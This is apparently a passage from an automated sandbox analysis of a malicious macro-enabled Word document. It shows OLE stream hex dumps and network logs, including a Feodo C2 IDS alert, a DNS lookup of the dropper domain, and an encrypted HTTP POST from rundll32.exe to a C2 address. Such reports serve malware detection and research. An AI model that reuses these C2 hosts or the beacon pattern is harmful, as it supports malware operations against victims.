                                            General
                                            Stream Path:Macros/UserForm3/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm3/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm4/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm4/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62402723855
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm4/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm4/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm5/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm5/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62202697924
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm5/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm5/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5943
                                            General
                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                            File Type:data
                                            Stream Size:5943
                                            Entropy:5.2550902767
                                            Base64 Encoded:True
                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                            Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                            Stream Path: Macros/VBA/dir, File Type: SVr2 curses screen image, big-endian, Stream Size: 1055
                                            General
                                            Stream Path:Macros/VBA/dir
                                            File Type:SVr2 curses screen image, big-endian
                                            Stream Size:1055
                                            Entropy:6.6689659801
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . v . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * l \\ C . . . . P . m . ! O . f f i c . g O
                                            Data Raw:01 1b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 8f 76 d0 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                            Stream Path: WordDocument, File Type: data, Stream Size: 42542
                                            General
                                            Stream Path:WordDocument
                                            File Type:data
                                            Stream Size:42542
                                            Entropy:3.7023684026
                                            Base64 Encoded:False
                                            Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . D . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 44 a0 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a6 00 00 70 61 21 5c 70 61 21 5c 44 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp                 Protocol  SID      Message                                             Source Port  Dest Port  Source IP     Dest IP
                                            01/07/21-13:43:41.778972  TCP       2404314  ET CNC Feodo Tracker Reported CnC Server TCP group 8  49168        80         192.168.2.22  184.66.18.83

                                            Network Port Distribution

                                            TCP Packets

                                            Timestamp                           Source Port  Dest Port  Source IP      Dest IP
                                            Jan 7, 2021 13:43:19.017200947 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:19.254103899 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:19.254256964 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:19.282660961 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:19.519469976 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:19.523015976 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:19.523066044 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:19.523104906 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:19.523183107 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:19.530138969 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:19.767519951 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:19.983613968 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.348145008 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.589004040 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589060068 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589097977 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589137077 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589145899 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.589175940 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589186907 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.589225054 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589268923 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589272976 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.589306116 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589346886 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589349985 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.589420080 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.589492083 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826329947 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826390028 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826420069 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826452017 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826491117 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826529026 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826565981 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826612949 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826625109 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826654911 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826662064 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826668978 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826694965 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826709986 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826734066 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826771021 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826786041 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826807022 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826843977 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826859951 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826880932 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826926947 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.826931953 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.826968908 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.827006102 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.827018976 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.827043056 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.827080965 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:21.827096939 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:21.829165936 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064307928 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064367056 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064408064 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064446926 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064482927 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064507008 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064529896 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064542055 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064572096 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064575911 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064610004 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064656019 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064660072 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064692974 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064728975 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064742088 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064765930 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064805984 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064816952 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064853907 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064894915 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064909935 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.064932108 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064970016 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.064984083 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.065007925 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065043926 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065057993 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.065082073 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065119982 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065130949 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.065169096 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065208912 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065224886 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.065247059 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065284014 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065298080 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.065321922 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065356970 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065371990 CET  49165        443        192.168.2.22   45.119.81.203
                                            Jan 7, 2021 13:43:22.065433979 CET  443          49165      45.119.81.203  192.168.2.22
                                            Jan 7, 2021 13:43:22.065474033 CET  443          49165      45.119.81.203  192.168.2.22

                                            UDP Packets

                                            Timestamp                           Source Port  Dest Port  Source IP     Dest IP
                                            Jan 7, 2021 13:43:18.623842955 CET  52197        53         192.168.2.22  8.8.8.8
                                            Jan 7, 2021 13:43:18.994874001 CET  53           52197      8.8.8.8       192.168.2.22
                                            Jan 7, 2021 13:43:20.033886909 CET  53099        53         192.168.2.22  8.8.8.8
                                            Jan 7, 2021 13:43:20.081928968 CET  53           53099      8.8.8.8       192.168.2.22
                                            Jan 7, 2021 13:43:20.087475061 CET  52838        53         192.168.2.22  8.8.8.8
                                            Jan 7, 2021 13:43:20.135555983 CET  53           52838      8.8.8.8       192.168.2.22
                                            Jan 7, 2021 13:43:20.615420103 CET  61200        53         192.168.2.22  8.8.8.8
                                            Jan 7, 2021 13:43:20.663501024 CET  53           61200      8.8.8.8       192.168.2.22
                                            Jan 7, 2021 13:43:20.668745041 CET  49548        53         192.168.2.22  8.8.8.8
                                            Jan 7, 2021 13:43:20.716762066 CET  53           49548      8.8.8.8       192.168.2.22

                                            DNS Queries

                                            Timestamp                           Source IP     Dest IP  Trans ID  OP Code             Name                Type            Class
                                            Jan 7, 2021 13:43:18.623842955 CET  192.168.2.22  8.8.8.8  0x71dd    Standard query (0)  dagranitegiare.com  A (IP address)  IN (0x0001)

                                            DNS Answers

                                            Timestamp                           Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address        Type            Class
                                            Jan 7, 2021 13:43:18.994874001 CET  8.8.8.8    192.168.2.22  0x71dd    No error (0)  dagranitegiare.com         45.119.81.203  A (IP address)  IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • 167.71.148.58
                                              • 167.71.148.58:443

                                            HTTP Packets

                                            Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                            0           192.168.2.22  49171        167.71.148.58   443               C:\Windows\SysWOW64\rundll32.exe
                                            Timestamp                           kBytes transferred  Direction  Data
                                            Jan 7, 2021 13:44:41.621895075 CET  320                 OUT        POST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1
                                            DNT: 0
                                            Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/
                                            Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXh
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 167.71.148.58:443
                                            Content-Length: 6868
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 7, 2021 13:44:42.530304909 CET   329                  IN          HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Thu, 07 Jan 2021 12:44:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 63 36 34 0d 0a 0a 82 0e ee 43 c4 48 f9 26 df 74 c1 e2 45 a4 7e 21 6f 77 d0 75 13 23 1f 38 7a 2c 67 bf f3 87 d9 3c 2b ab 31 4a e1 94 44 4a 71 82 fa db 89 f1 d4 64 45 28 c4 f7 18 26 ad 26 b1 9e ff e6 33 d0 a2 c4 dd 43 05 a8 65 79 bd 5e 2e 6a fb 7c 3d f7 55 84 0c b4 2b 78 18 0f 07 73 b4 e3 37 83 65 be 28 44 66 e8 e3 7f 8d b3 60 6b f2 3f 0d db 65 57 1f 76 62 e2 f2 89 05 f1 58 10 8b ab 4b 9b bd 77 3b 8f b3 e6 f7 c7 5d 8d 80 4c 09 03 86 d1 20 b7 34 f7 9a 52 af b1 03 58 7b f0 5f c5 c9 aa 1f b8 65 ba 9b 98 84 98 44 0b 40 ec 32 17 e7 fa e1 be 55 d5 27 db 9f 49 5c 9e d6 fd 6b 2d 5e 6c 94 fc 04 fb cf 39 19 34 84 25 ba 01 f1 59 d4 22 44 c4 7c 19 0e 78 4d 40 63 29 a3 e4 e8 f1 6d cb 09 51 4a 9c bb 3c 49 7c 23 57 7d 8a b9 99 20 c2 4d 2f 0e 7e a4 f9 ac 5d 10 96 4d 8a 39 81 dd b9 82 70 02 a6 00 27 2a d5 bf fe 3c c8 8c 11 2b 9c 2e 7b 1e 99 c1 4a e6 07 6d 80 6e 14 ab 86 ce bf 10 2f 62 65 05 98 17 e8 b7 45 8a 3c 59 82 7e 06 3d 46 14 b9 5c 9f 9f 7b 36 61 94 a2 bc a8 be 01 92 b7 c9 5f d7 bd c1 a9 40 ed 1d 1a 8f be 14 74 cc 7f e0 c1 a1 2c 2e 50 53 75 a7 ee e1 2f 3a d7 b8 e3 ea f3 30 81 d1 d6 07 21 95 36 37 09 6f d5 bc 95 90 c3 44 29 8f 4c 14 e2 81 45 c8 f5 ad 5f 15 87 25 90 08 88 9b 01 af f4 9f 77 c4 1e c4 1b 1a 09 6f 3f d4 62 3e f5 97 36 83 84 b1 77 94 d1 c1 6c 26 e5 c9 78 b5 d5 d5 ff 56 9f ae c4 21 0b 50 51 dc f9 14 8e 24 f6 27 51 88 c8 46 9b 97 57 59 20 c8 95 28 d5 44 de 5f 41 23 b8 60 50 94 a1 47 fe f6 42 13 56 2b 1a d3 eb 4f 86 b0 e3 e3 fd 52 5d 1e 63 d2 3c 23 c2 16 21 63 7f 9b 5f 64 be 90 e2 aa c4 d2 c7 0a d0 37 d1 cf 1b ba 7b 1d 08 a3 41 3a 98 48 9a f9 4f 03 8e fb d7 e8 35 65 de a2 a7 cd af 24 98 18 fe 76 3c 6d 0b f1 e5 d9 29 de b1 58 00 6a 2e 7c c0 e9 dd b7 68 5b ee f3 75 c3 6c f4 0a 00 f8 af 29 80 4e 44 3c ba bb 38 e8 b1 2f 51 d1 bc 32 cf 99 a3 47 02 57 73 4d ee a7 6d 36 f5 38 36 15 39 8c 03 00 bd 33 be 13 5a b8 bd 39 b6 02 f7 0e 1c ea 81 90 03 0d 65 d1 ac 07 ca a6 e0 3a 84 47 09 40 6d f6 a4 59 ad 9c 88 72 5a a7 8b 28 82 b2 
9f d3 32 c9 44 29 40 ca 9c 18 80 da 3a e0 2c 0b ba d9 25 75 b5 10 5e d2 b9 82 50 30 74 f7 89 72 02 d4 77 a5 bb 05 0a 01 3e 5e 8a 34 74 17 19 55 5c ae c0 4d 01 c4 6e 5a 6a a5 61 41 87 61 15 5b 56 7f 1d 1a 4c 38 1c d2 1d d2 22 ea e4 a9 99 4f d3 68 c1 b1 af 65 c6 89 8a 1f 72 29 6b f1 7d 01 c9 e2 19 cc dc e4 19 cb 7f 7e 8f df 20 6c 14 19 80 df 48 0b d4 7d f0 02 02 26 99 88 84 60 c7 8b 9d 62 f0 3e 58 c0 c7 84 48 2d d4 bf b7 be f7 b1 a1 18 f0 2e d0 20 a1 bb ad 40 34 d8 95 8c eb f2 76 54 db c4 c7 c4 31 a9 28 83 6b 4a 78 73 94 8d 2a 8e 75 a7 50 2d c2 8b 62 1f 87 5b 40 89 f1 52 49 f1 08 23 66 64 51 84 aa fd 33 92 19 f5 32 0f 49 7a f1 98 d0 ee 0a 01 3d 7a 1a 91 99 bf e4 fe 0b fd 0c 5c 66 6b ef d0 2f df 04 ee 38 11 fa 6c bd a3 84 6b c2 19 3c f2 b9 4a 6f 1a 67 5c a6 c8 e4 db 5f 51 ab 51 29 d3 3c b5 07 43 9c a1 89 27 2f 81 d5 63 5a 6d a7 43 34 c7 18 d5 38 64 44 b5 32 16 de 9d 6e bf 5b 58 14 65 1e 49 3b e9 2c 24 c7 51 ca a0 4c f3 57 fe 0a 73 4e 90 ab 00 cb 46 51 f9 0e 22 fa ab 80 bb 2b 62 ae 65 e8 ad 8f 03 11 1a 9c d6 87 d5 20 76 be 32 46 ed f5 9e 3b 66 7d 88 ca fd 2f b5 ae 2a ca 00 e5 e7 cd 47 63 cb 8c b5 da be 8d b7 5e 7a 91 9f b6 f7 56 74 94 1e 6a 25 b6 48 a9 38 23 f0 0c 71 1c a3 19 97 b6 a7 d0 0c 7d ed bb 8f b1 36 b4 4b 96 df 0b 15 8b b1 48 a1 38 9a 3a 65 33 1d bf 3d ff 9b 2f b3 de 2f d4 ee 9a 00 5f 64 d2 06 d2 91 2b 04 ab a4 c6 e4 27 9a 69 10 07 05 65 5b c6 2c c1 25 c7 15 26 62 97 15 4a 20 73 26 54 5c 9b e2 d5 5a 20 eb 4c ec e5 f8 dd a1 7a 56 17 dc d8 4d 90 0c 43 57 be 1d 7c fd b3 7c 34 39 92 b8
